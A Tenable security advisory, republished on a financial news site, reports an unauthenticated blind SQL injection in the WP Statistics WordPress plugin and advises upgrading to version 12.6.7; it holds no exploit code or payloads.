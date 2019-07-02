Log in
E-mail
Password
Remember
Forgot password ?
Become a member for free
Sign up
Sign up
Settings
Settings
Dynamic quotes 
OFFON

MarketScreener Homepage  >  News  >  Companies  >  All News

News : Companies
Latest NewsCompaniesMarketsEconomy & ForexCommoditiesInterest RatesBusiness LeadersFinance ProfessionalsCalendarSectors
All News
Analyst Recommendations
Rumors
IPOs
Capital Markets Transactions
New Contracts
Profits warnings
Appointments
Press Releases
Events
Corporate actions

Tenable : WP Statistics WordPress Plugin Vulnerable to Unauthenticated Blind SQL Injection

share with twitter share with LinkedIn share with facebook
share via e-mail
0
07/02/2019 | 03:58pm EDT

Popular WordPress Plugin with over half a million installations is potentially vulnerable to unauthenticated blind SQL injection attacks.

Background

On July 1, maintainers of WP Statistics, a popular WordPress plugin for gathering website statistics about visitor data that boasts over 500,000 active installations, released an update to address a serious vulnerability.

Analysis

Researcher Thomas Chauchefoin discovered and reported an unauthenticated blind SQL injection (SQLi) in the WP Statistics plugin versions 12.6.6.1 and lower. The vulnerability exists in a non-default configuration of the plugin. By default, the Cache Plugin setting in WP Statistics is disabled.

However, enabling this setting could allow an unauthenticated remote attacker to pass a blind SQLi command via the WP Statistics API endpoint. Since the SQLi vulnerability affects both SELECT and UPDATE queries, this could potentially be abused to perform a variety of actions, including changing the administrator credentials, adding another administrator account to the vulnerable WordPress site, exfiltrating user data and more.

This isn't the first SQLi discovered in the WP Statistics plugin. Researchers at Sucuri blogged about their discovery of an SQLi in 2017, and researcher Marcin Probola discovered a blind SQLi in the plugin back in 2015.

Proof of concept

A proof-of-concept (PoC) was shared by the researcher in the WP Vulnerability database posting.

Solution

This vulnerability is addressed in WP Statistics version 12.6.7 or greater. While the vulnerable configuration is not enabled by default, with over a half a million active installations it is likely that a large number of WP Statistics users are vulnerable. All users should upgrade to the latest version of the plugin as soon as possible.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they're released.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

Disclaimer

Tenable Holdings Inc. published this content on 02 July 2019 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 02 July 2019 19:57:01 UTC
share with twitter share with LinkedIn share with facebook
share via e-mail
0
Latest news "Companies"
04:16pDPW HOLDINGS, INC. : Announces Adjournment of Annual Meeting of Stockholders
BU
04:16pBECTON DICKINSON AND : BD Announces Live Webcast of Third Fiscal Quarter Earnings Conference Call
PR
04:16pPACIFIC GAS & ELECTRIC CO : Other Events (form 8-K)
AQ
04:16pCELANESE : to Hold Second Quarter Earnings Conference Call on July 23, 2019
BU
04:16pALAMO GROUP INC. : Declares Regular Quarterly Dividend
PR
04:16pPG&E CORP : Other Events (form 8-K)
AQ
04:16pAdhera Therapeutics Announces Termination of Tender Offer for Warrants
GL
04:16pTecnoglass Announces Timing of Regular Quarterly Dividend for Second Quarter 2019
AQ
04:16pUSANA HEALTH SCIENCES : Provides Preliminary Second Quarter Results and Updates Fiscal Year 2019 Outlook
BU
04:16pHCP : to Report Second Quarter 2019 Financial Results and Host Conference Call/Webcast
PR
Latest news "Companies"
Advertisement

MOST READ NEWS

1ANHEUSER-BUSCH INBEV : ANHEUSER BUSCH INBEV : AB InBev Unit Seeks to Raise Up to $9.8 Billion in Hong Kong IPO
2AB InBev seeks $9.8 billion for Asia stake in world's largest 2019 IPO
3NIDEC CORPORATION : NIDEC : Completes Acquisition of Embraco, Whirlpool Corporation's Compressor Business
4CCC SA : Polish cabinet postpones talks on retail tax due to PM absence
5PROGENICS PHARMACEUTICALS, INC. : PROGENICS PHARMACEUTICALS : Leading Independent Proxy Advisory Firm Glass Le..

HOT NEWS
Categories
Free services
Mobile App
Premium service
About